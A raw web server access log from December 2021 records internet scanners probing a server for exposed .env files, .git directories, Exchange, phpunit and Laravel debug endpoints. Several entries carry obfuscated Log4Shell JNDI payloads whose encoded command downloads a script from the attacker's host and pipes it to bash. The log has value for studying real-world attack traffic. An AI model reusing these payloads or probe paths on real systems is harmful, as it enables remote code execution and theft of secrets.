"/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.242] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:08:28:32 +0000] 400 - - http localhost "-" [Client 81.17.18.62] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:08:28:39 +0000] 400 - - http localhost "-" [Client 185.220.101.47] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:09:29 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:09:40:42 +0000] 444 - GET https localhost "/" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:40:43 +0000] 444 - OPTIONS https localhost "/" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:40:43 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:40:44 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:40:49 +0000] 400 - - https localhost "-" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:40:50 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:40:51 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:40:51 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:40:52 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:40:52 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/Portal/Portal.mwsl" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/Portal0000.htm" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 444 - POST https 64-22-31-253.res.aeneas.net "/scripts/WPnBr.dll" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/.git/HEAD" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/nmaplowercheck1640425288" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/Portal/Portal.mwsl" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/Portal0000.htm" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - POST http 64-22-31-253.res.aeneas.net "/scripts/WPnBr.dll" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:29 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/.git/HEAD" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - - http localhost "-" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:41:30 +0000] 444 - GET https localhost "/" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:41:30 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/favicon.ico" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/CSS/Miniweb.css" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 444 - POST https 64-22-31-253.res.aeneas.net "/sdk" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - SSTP_DUPLEX_POST https 64.22.31.253 "/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/" [Client 172.104.159.48] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:09:41:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/__Additional" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/pools/default/buckets" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/docs/cplugError.html/" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/nmaplowercheck1640425289" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/favicon.ico" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/CSS/Miniweb.css" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:30 +0000] 400 - POST http 64-22-31-253.res.aeneas.net "/sdk" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/inicio.jsa" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/sNFU" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/nmaplowercheck1640425289" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/pools" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/inicio.jsa" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/sNFU" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - HEAD https 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/pools" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/HNAP1" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 400 - HEAD http 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/index.aspx" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/HNAP1" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/index.aspx" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/index.shtml" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:32 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:33 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/index.shtml" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:33 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/indice.jsp" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:34 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/indice.jsp" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:34 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/start.cfm" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:34 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/start.cfm" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:35 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/main.jhtml" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:35 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/main.jhtml" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:36 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/menu.html" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:36 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/menu.html" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:37 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/robots.txt" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:37 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/robots.txt" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:38 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/home.cgi" [Client 172.104.159.48] [Length 0] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:38 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/home.cgi" [Client 172.104.159.48] [Length 252] [Gzip -] "curl/7.54.0" "-" [25/Dec/2021:09:41:39 +0000] 444 - GET https localhost "/" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:41:39 +0000] 400 - GET http localhost "/" [Client 172.104.159.48] [Length 252] [Gzip -] "-" "-" [25/Dec/2021:09:41:40 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:09:41:40 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 172.104.159.48] [Length 252] [Gzip -] "-" "-" [25/Dec/2021:09:42:14 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:09:42:14 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:09:42:14 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:09:42:14 +0000] 400 - GET http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:09:42:15 +0000] 444 - HEAD https 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:09:42:15 +0000] 400 - HEAD http 64-22-31-253.res.aeneas.net "/" [Client 145.239.154.85] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [25/Dec/2021:10:10:02 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:10:14:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Dec/2021:10:48:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:11:22:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:12:31:48 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [25/Dec/2021:12:34:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:13:28:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.211.83] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:13:29:17 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [25/Dec/2021:14:41:14 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.13] [Length 0] [Gzip -] "Go http package" "-" [25/Dec/2021:15:14:54 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:15:16:06 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:15:17:08 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [25/Dec/2021:15:26:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Dec/2021:16:13:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:16:15:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:16:17:32 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:16:34:04 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.105.127] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Dec/2021:17:41:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Dec/2021:17:57:04 +0000] 444 - POST https 64.22.31.253 "/owa/auth.owa" [Client 173.232.146.250] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [25/Dec/2021:19:17:54 +0000] 400 - - http localhost "-" [Client 87.251.64.141] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:20:09:55 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Dec/2021:20:10:20 +0000] 444 - GET https mta1.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Dec/2021:20:37:04 +0000] 400 - - http localhost "-" [Client 87.251.64.141] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:21:52:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.113] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:21:52:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.113] [Length 252] [Gzip -] "-" "-" [25/Dec/2021:22:07:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [25/Dec/2021:22:14:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:22:24:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [25/Dec/2021:22:24:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [26/Dec/2021:00:21:52 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:00:27:37 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:01:07:39 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:01:50:11 +0000] 444 - GET https mx0.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:02:17:02 +0000] 400 - GET http localhost "/" [Client 47.97.198.70] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:03:14:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:04:18:23 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Dec/2021:04:18:23 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Dec/2021:04:30:17 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:06:06:26 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:06:30:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.67] [Length 0] [Gzip -] "-" "-" [26/Dec/2021:06:43:25 +0000] 444 - GET https owa.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:06:51:07 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 89.163.242.196] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Dec/2021:07:18:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:07:58:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:08:10:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [26/Dec/2021:08:10:29 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211226161029" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [26/Dec/2021:08:14:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.246.130] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [26/Dec/2021:08:15:32 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:08:20:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.251] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Dec/2021:08:30:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Dec/2021:09:14:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:09:44:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.83.204.67] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3078.67 Safari/537.32" "-" [26/Dec/2021:09:44:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.83.204.67] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3078.67 Safari/537.32" "-" [26/Dec/2021:09:50:12 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [26/Dec/2021:09:54:47 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:09:54:47 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:10:42:12 +0000] 444 